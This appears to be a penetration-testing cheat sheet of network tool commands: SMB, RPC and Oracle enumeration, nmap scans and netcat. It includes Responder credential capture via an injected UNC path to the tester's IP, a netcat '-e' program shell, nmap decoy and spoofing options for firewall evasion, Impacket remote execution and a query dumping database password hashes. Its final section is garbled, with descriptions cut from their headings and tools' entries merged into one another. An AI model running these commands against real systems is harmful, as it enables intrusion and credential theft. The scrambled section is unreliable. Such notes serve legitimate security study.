Here are some tools and utilities commonly used for practices related to networks:
OpenVPN
VPN system which implements both client and server applications, including a command-line utility
Commands
Installation
sudo apt install openvpn
Connect to a VPN
sudo openvpn $ovpnfile
SmbClient
Tool for accessing a server using the protocol
Commands
Installation
sudo apt install smbclient
Connect and interact with an SMB server
smbclient -I $IP #Connect to server
smbclient -L $IP -N #List elements on the server without providing a password
smbclient //$IP/$ShareName #Acces to a shared instance
smbclient \\\\$IP\\$ShareName #Alternative
smbclient //$IP/$ShareName $username #Connect indicating a username
smbclient //$IP/$ShareName -c "$comand" #Execute a command
smb: \> #Text based interface
smb: \> get $filename #Download a file
smb: \> put $filename #Upload a file
smb: \> exit #Close connection
Responder
Commands
Install
sudo apt install responder
Change configuration file
sudo nano /usr/share/responder/Responder.conf #Installed here by default
Initialize tool
sudo responder -I $networkinterface
If we get an error in any port, we have to update the Responder.conf file and set to off the value of the service related to that port
http://$url/$query?$value=//$myip/somefile
If the process works, we will see the server catch the credentials
Tcpdump
Commands
Install
sudo apt install tcpdump
Set up listener
sudo tcpdump -i $networkInterface port $port
Netcat
Unix utility which reads and writes data across network connections
Can act as a server or as a listener
By default makes a TCP connection but can be used with TCP or UDP protocol
Commands
Install
sudo apt install netcat-traditional
Start netcat
nc $hostname $port
nc -n $IP $port #Use only numeric IP no DNS
nc -v $hostname $port #Verbose Output
Start in listen mode
nc -l -p $port
nc -nvlp $port #The best way to make it
Make a file transmission
nc -nvlp $port > $incomingfile #From listening side
nc -n -v -p $port < $file #From sender side
#From the listening side
$incomingfile -h #Check if the transmission was correct
Execute a program over the server
nc -l -p $port -e $program
Interact with network protocols
#Example
sudo nc $ip 80 #We connect to HTTP service
#We send a petition
GET / HTTP/1.1
host: netcat #After finishing hit enter to send
To make a line jump is necessary to press Shift+Enter
Nmap
Open source tool for network exploration and security auditing which works as a network mapper
Scan types
SYN scans are also known as Half-open or Stealth. They are stealthier than Connect scans
The difference between Connect and SYN scans is that Connect performs a full three-way handshake with the target. Instead of that SYN scans send back an RST packet after receiving an SYN/ACK
The UDP scans are slower than TCP scans
In UDP scans if the port is open it will send no response and will be marked as open|filtered. If there's a response will be marked as open. If it's closed, the target responds with an ICMP packet containing a message that the port is unreachable
NULL, FIN, Xmas, and ACK scans are stealthier than SYN or UDP scans, usually used for firewall evasion
NULL scans send a TCP request with no flags, the target host responds with RST if the port is closed
FIN scans send a TCP request with the FIN flag, used to gracefully close an active connection, the target host responds with RST if the port is closed
Xmas scans send a malformed TCP packet, and the target host responds with RST if the port is closed
Microsoft Windows may respond to a NULL, FIN or Xmas scan with a RST for every port
NSE
Every script has a category related to its use scenario
By default nmap stores scripts in /usr/share/nmap/scripts/script.db
Port State
Open: This indicates that the connection to the scanned port has been established
Closed: TCP protocol indicates that the packet we received back contains an RST flag. Can be used to determine if a target is alive or not
Filtered: Cannot correctly identify whether the scanned port is open or closed because it got no response or an error code from the target
Unfiltered: Only occurs during the TCP-ACK scan and means that the port is accessible, but it cannot be determined if it's open or closed
Open|filtered: Didn't get a response, so a firewall or packet filter could be protecting the port
Closed|filtered: Only occurs in the IP ID idle scans, indicating it was impossible to determine if a port is closed or filtered by a firewall
Commands
Install
sudo apt install nmap
Basic scans
nmap $scantype $options $target #General syntax
nmap $ip #Scan an IP
nmap $domain #Scan an IP using domain
nmap $ip1 $ip2 # Scan some IPs
nmap x.x.x.$range1-$range2 #Scan a range of IPs
nmap x.x.x.x/$mask #Scan using CIDR notation
nmap -iL $inputfile #Scan using the IPs from a list
nmap -iR $number #Scan random hosts
nmap --exclude $ip #Scan excluding an specific IP
nmap --excludefile $file #Scan excluding the IPs from a list
TCP scan
nmap -sT $target #TCP Connect scan, default if run without sudo
nmap -sS $target #TCP SYN scan, default if run with sudo
nmap -sN $target #TCP Null scan, good for firewall evasion
nmap -sF $target #TCP FIN scan, good for firewall evasion
nmap -sX $target #TCP Xmas scan, good for firewall evasion
nmap -sA $target #TCP ACK scan, good for firewall evasio
UDP scan
nmap -sU $target
Select which port scan
nmap -p $port $target
nmap -p $port-port $target #Select a range of ports
nmap -p- $target #Scan all ports
nmap --top-ports $numberofports $target #Specify the most common ports
nmap -F $target #Scan the 100 most common ports
Scan without checking if target is alive
nmap -Pn $target #Don't ping a port to confirm if it is alive
nmap --disable-arp-ping $target #Don't ping a port via ARP
Append an arbitrary length of random data to the end of packets
nmap $target --data-length $number
Specify the number of retries if a packet gets dropped or blocked
nmap $target --max-retries $number
For firewall evasion
nmap $target -Pn -n -S $myIP -e $interface #Use different Source IP
nmap $target -Pn -n --disable-arp-ping -D RND:$number $target #Use Decoys to vary between random IPs
nmap $target -Pn -n --disable-arp-ping --source-port 53 #Use DNS service as proxy
ARP-Scan
Only devices in the same subnet can be discovered
Commands
Install
sudo apt install arp-scan
Scan options
arp-scan $tagetRange
arp-scan -l #Scan local network
arp-scan $tagetRange -I $netInterface #Specify which network interface to use
Masscan
Tool for making port scanning, which is optimized for speed, making it particularly useful for large-scale scans
Commands
Install
sudo apt install masscan
Scan options
masscan $targetRange -p $ports
masscan $targetRange ‐‐top-ports $number #Specify number of most used ports
Docker
An open-source platform that allows to build, package, and run applications in isolated environments called containers
sudo docker rm $containerID #Delete a container
sudo docker build . #Build an image from a Dockerfile in the actual folder
sudo docker image ls #List all installed images
sudo docker image rm $imageID #Delete a installed image
sudo docker container ls #List all running containers
sudo docker run $containerID #Run container using ID
sudo docker run $containerName #Run container using Name
sudo docker run $containerName --rm #Run container but deleted when done
sudo docker run $containerName -p $hostPort:$containerPort #Specificate run ports
sudo docker container stop $containerID #Stop a running container
sudo docker compose up -d #Use .yml file to run various containers in the background
onesixtyone
Is an SNMP scanner used to brute force the community string names
Commands
Install
sudo apt install onesixtyone
Usage
onesixtyone -c $dictionary $IP
xfreerdp
Commands
Install
sudo apt install freerdp2-x11
Usage
xfreerdp /v:$host #Conenct to a remote machine
xfreerdp /v:$host /u:$username #Connect as a user without providing a password
xfreerdp /v:$host /u:$username /p:$password #Connect as a user providing password
Rsync
Command-line tool for fast, flexible, and efficient file and directory synchronization and transfer between two locations
Commands
Install
sudo apt install rsync
Usage
rsync $IP #Connect to the remote service
rsync --list-only $IP #Just list the contents
rsync 10.129.197.128:: #When the target is using a daemon instead of SSH
rsync --list-only $IP::$foldername #List content fo a folder
rsync $IP::$foldername/$filename $localroute #Transfer a shared file
Impacket
Collection of Python classes for working with network protocols
Commands
Installation
sudo apt install python3-impacket
Use of scripts
sudo impacket-$scriptname $options
#Common scripts
sudo impacket-mssqlclient $hostname/$user@$ip #Connect to MS SQL server
sudo impacket-mssqlclient $hostname/$user@$ip -windows-auth #Use Windows authentication to connect to MS SQL server
sudo impacket-psexec $username@$IP #Connect to the network service of a host
sudo impacket-samrdump $IP #Bruteforce SMB user RDIs
sudo impacket-wmiexec $username:"$password"@$IP "$hostname" #Chech WMI protocol
Scapy
Powerful interactive packet manipulation library written in Python, used to forge or decode packets of a wide number of protocols, send, capture them, match requests and replies, and much more
Commands
Install
pip install scapy
Usage
sudo scapy #Enter interactive mode
>>> send(IP(dst="$IP")/ICMP()/"$Payload") #Send a ICMP package
>>> ls() #List all available formats and protocols
>>> ls($Protocol) #List all options and fields of a protocol or packet format
>>> explore() #Navigate Scapy layers and protocols
>>> explore($Protocol) #Navigate a specific protocol or packet format
Tshark
Packet capture tool used to capture ICMP packets. Comes by default in the Wireshark tool packet
Commands
Install
sudo apt install wireshark
Usage
sudo tshark host $IP
Aircrack-ng
Wireless security toolset used for monitoring, attacking, testing, and cracking Wi-Fi networks
Central tool to realize operational and work-sharing structures in networks and client-server architectures, useful for enumeration of SMB protocol
Commands
Install
sudo apt install rpcclient
Usage
rpcclient -U "$username" $IP # Conect to a host
rpcclient -U "" $IP # Connect anonymously
rpcclient $> srvinfo # Get server information.
rpcclient $> enumdomains # Enumerate all deployed domains
rpcclient $> querydominfo # Get domain, server, and user information
rpcclient $> netshareenumall # Enumerate all available shares
rpcclient $> netsharegetinfo $share #Provide information about a share
rpcclient $> enumdomusers # Enumerate all domain users
rpcclient $> queryuser $userID # Provide information about a user
rpcclient $> querygroup $groupID # Provide information about a user
smbmap
Security tool used for enumerating and interacting with SMB shares on a network
Commands
Install
sudo apt install smbmap
Usage
smbmap -H $IP
CrackMapExec
Powerful post-exploitation tool used for network reconnaissance, credential validation, and lateral movement in Windows Active Directory (AD) environments
The first time running odat there will be some errors, but it's normal and won't appear later
Usage
./odat.py -h #Get help many, use to confirm installation was successful
./odat.py all -s $IP #Scan target using all modules
./sqlplus $User/$Password@$IP/$SIDfound #Log as an user
./sqlplus $User/$Password@$IP/$SIDfound as sysdba #Log as System Database Admin
#Once inside the database
SQL> select table_name from all_tables; #Get table names
SQL> select * from user_role_privs; #Check the privileges of the user
SQL> select name, password from sys.user$; #Get passwords form users
Help in the passive obtention of credentials by mounting an server on the web that intercepts internal communication from this protocol
Abuse an on a web page to intercept SMB credentials
Command-line packet analyzer tool used to capture and inspect network traffic sent via the protocol in real-time
The is a library of scripts written in Lua that can be used for scanning vulnerabilities and automating exploits for them.
Tool for making host discovery via protocol
An open-source implementation for the protocol
Tool for making user enumeration for the protocol
Oracle Database Attacking Tool, an open-source penetration testing tool that tests the security of databases remotely
